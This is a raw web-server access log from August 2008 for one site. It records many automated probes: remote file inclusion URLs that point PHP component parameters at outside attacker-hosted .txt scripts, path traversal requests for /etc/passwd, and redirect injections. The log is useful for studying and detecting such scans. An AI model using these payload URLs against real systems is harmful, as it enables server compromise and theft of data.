89.111.176.106 - - [03/Aug/2008:17:00:01 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.232.178.178 - - [03/Aug/2008:17:00:33 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
65.55.208.10 - - [03/Aug/2008:17:00:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
65.55.208.10 - - [03/Aug/2008:17:00:38 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:01:07 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:01:07 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:01:07 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:17:01:15 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:01:17 -0700] "GET /logs/access_071217.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
89.111.176.106 - - [03/Aug/2008:17:02:14 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [03/Aug/2008:17:02:14 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.209.236.71 - - [03/Aug/2008:17:02:32 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.summitcircle.com"
195.209.236.71 - - [03/Aug/2008:17:02:32 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.summitcircle.com"
66.135.59.180 - - [03/Aug/2008:17:02:35 -0700] "GET //include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.135.59.180 - - [03/Aug/2008:17:02:35 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.135.59.180 - - [03/Aug/2008:17:02:44 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.64.208 - - [03/Aug/2008:17:02:50 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
89.111.179.12 - - [03/Aug/2008:17:02:50 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.64.208 - - [03/Aug/2008:17:02:50 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
89.111.179.12 - - [03/Aug/2008:17:02:50 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:03:13 -0700] "GET /logs/access_071015.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:03:13 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:03:13 -0700] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.94.30.30 - - [03/Aug/2008:17:03:29 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.summitcircle.com"
69.94.30.30 - - [03/Aug/2008:17:03:29 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:03:31 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:03:31 -0700] "GET //include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.139.67.20 - - [03/Aug/2008:17:03:32 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.summitcircle.com"
216.139.67.20 - - [03/Aug/2008:17:03:33 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:03:37 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:03:37 -0700] "GET //include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:03:45 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:03:55 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
78.80.18.136 - - [03/Aug/2008:17:03:56 -0700] "GET /logs/?sourcedir=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 200 6086 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.80.18.136 - - [03/Aug/2008:17:03:57 -0700] "GET /?sourcedir=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
125.175.78.175 - - [03/Aug/2008:17:03:58 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.summitcircle.com"
125.175.78.175 - - [03/Aug/2008:17:03:58 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.summitcircle.com"
209.47.165.69 - - [03/Aug/2008:17:04:02 -0700] "GET /logs/access_080211.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://olivegreensonline.com/Forms/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
209.47.165.69 - - [03/Aug/2008:17:04:02 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://olivegreensonline.com/Forms/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
209.47.165.69 - - [03/Aug/2008:17:04:02 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://olivegreensonline.com/Forms/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
76.74.137.190 - - [03/Aug/2008:17:04:07 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
76.74.137.190 - - [03/Aug/2008:17:04:07 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
67.18.29.218 - - [03/Aug/2008:17:04:11 -0700] "GET /logs/access_070917.log//components/errors.php?error=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
218.219.147.58 - - [03/Aug/2008:17:04:11 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
212.227.118.35 - - [03/Aug/2008:17:04:11 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.118.35 - - [03/Aug/2008:17:04:12 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
218.219.147.58 - - [03/Aug/2008:17:04:12 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
217.20.116.93 - - [03/Aug/2008:17:04:35 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "summitcircle.com"
217.20.116.93 - - [03/Aug/2008:17:04:35 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:04:41 -0700] "GET //?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "summitcircle.com"
89.218.85.18 - - [03/Aug/2008:17:04:44 -0700] "GET /logs/show_news.php?cutepath=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "summitcircle.com"
89.218.85.18 - - [03/Aug/2008:17:04:44 -0700] "GET /show_news.php?cutepath=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:04:58 -0700] "GET //?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.27.112.153 - - [03/Aug/2008:17:05:54 -0700] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
88.27.112.153 - - [03/Aug/2008:17:05:54 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
88.27.112.153 - - [03/Aug/2008:17:05:54 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
205.178.184.113 - - [03/Aug/2008:17:06:51 -0700] "POST /wsnlinks/comments.php?ACTION=post&filled=1 HTTP/1.1" 404 275 "http://www.summitcircle.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:07:28 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:07:28 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
67.15.8.80 - - [03/Aug/2008:17:07:47 -0700] "GET /logs/access_071021.log//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
217.20.116.93 - - [03/Aug/2008:17:07:51 -0700] "GET /logs/access_080204.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
217.20.116.93 - - [03/Aug/2008:17:07:51 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
217.20.116.93 - - [03/Aug/2008:17:07:52 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
217.20.116.93 - - [03/Aug/2008:17:08:06 -0700] "GET /logs/access_080204.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
217.20.116.93 - - [03/Aug/2008:17:08:06 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
217.20.116.93 - - [03/Aug/2008:17:08:06 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:08:13 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:08:13 -0700] "GET /modules/xfsection/modify.php?dir_module=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:08:13 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
88.27.112.153 - - [03/Aug/2008:17:08:14 -0700] "GET /logs/access_080128.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:08:25 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:08:25 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:08:32 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:17:08:32 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:08:33 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:08:35 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:08:35 -0700] "GET /logs/access_070730.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.15.8.80 - - [03/Aug/2008:17:08:37 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.8.80 - - [03/Aug/2008:17:08:37 -0700] "GET /logs/access_071224.log//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.8.80 - - [03/Aug/2008:17:08:48 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:17:09:12 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:17:09:12 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:17:09:13 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
217.20.116.93 - - [03/Aug/2008:17:09:44 -0700] "GET /logs/access_080210.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
217.20.116.93 - - [03/Aug/2008:17:09:48 -0700] "GET /logs/access_080210.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:17:09:51 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:17:09:51 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:17:09:52 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:10:13 -0700] "GET /logs/access_080127.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:10:13 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:10:13 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:10:46 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
212.117.89.191 - - [03/Aug/2008:17:10:50 -0700] "GET /logs/?sourcedir=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 200 6086 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.117.89.191 - - [03/Aug/2008:17:10:51 -0700] "GET /?sourcedir=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:11:06 -0700] "GET /logs/access_071112.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:11:06 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:11:06 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:11:19 -0700] "GET /logs/access_080121.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:11:19 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:11:19 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:11:20 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:11:20 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:11:21 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:11:35 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
212.227.118.35 - - [03/Aug/2008:17:11:38 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.118.35 - - [03/Aug/2008:17:11:38 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.227.118.35 - - [03/Aug/2008:17:11:38 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
221.144.12.141 - - [03/Aug/2008:17:11:40 -0700] "GET /logs/access_080127.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:11:53 -0700] "GET /logs/access_071231.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:11:53 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:11:57 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:12:06 -0700] "GET /logs/access_071210.log//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:12:07 -0700] "GET /logs//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 200 6091 "-" "libwww-perl/5.805" "www.summitcircle.com"
